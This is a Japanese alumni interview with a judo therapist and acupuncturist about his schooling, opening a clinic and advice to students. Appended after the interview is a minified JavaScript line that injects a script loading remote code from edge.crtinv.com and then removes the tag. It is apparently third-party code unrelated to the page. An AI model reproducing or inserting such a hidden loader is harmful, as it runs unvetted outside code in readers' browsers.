柔道整復師・鍼灸師 上坊 さん

P0301

感謝していただける事が一番の喜び。

Profile
柔道整復師・鍼灸師 上坊 さん
うえぼう鍼灸接骨院 院長
平成20年3月 京都医健 柔道整復科I部(午後集中コース)卒業
明治東洋医学院専門学校 出身

Qaq 柔道整復師を目指したきっかけ

Qaa 高校卒業後、大阪の学校で鍼灸師免許を取得し、10年以上整形外科勤務していました。そんな時に、京都医健が開校し自宅や職場に近く午後集中コースなら働きながら通えるので入学を決めました。

Qaq 学生時代の思い出

Qaa 学校の勉強から10年以上はなれていましたが、色々な年齢のクラスメイトがいてとても楽しかったです。鍼灸師の資格を持っていたことで勉強もスムーズに入っていけましたし、若い頃より興味を持って勉強ができました。何より湊谷先生の柔道の授業が楽しかったです。
クラスメイトとは今でも一緒に勉強会に参加したり、情報交換もしています。

Qaq 開業に至った経緯

Qaa 資格取得後も整形外科で勤務していましたが、柔道整復師と鍼灸師の2つの免許を活かしたいと考え、また良い場所にも巡り合えたので開業する事にしました。

Qaq 現在の仕事について

Qaa 開業してからの方が責任も重くなり、正直人に雇われているほうが楽だと感じることもありますが、患者さまから「良くなったよ」とか「ありがとう」と感謝していただける事が一番の喜びであり、やりがいです。
患者さまにしっかりと症状やその原因を説明し、納得していただいてから治療が出来るよう心がけています。

Qaq 柔道整復師を目指す方へのメッセージ

Qaa 柔道整復師に必要な医学の勉強は覚える事が多く大変ですが、学校の授業をしっかりと受け、定期試験をきっちりとクリアしていけば国家試験はそんなに心配はいらないと思います。
「お金もうけのためでなく、患者さまに喜んでもらいたい」という想いを持っておられる人にはおすすめの職業です。社会で色んな経験をしてから入学した方が頑張れることもありますよ。

!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();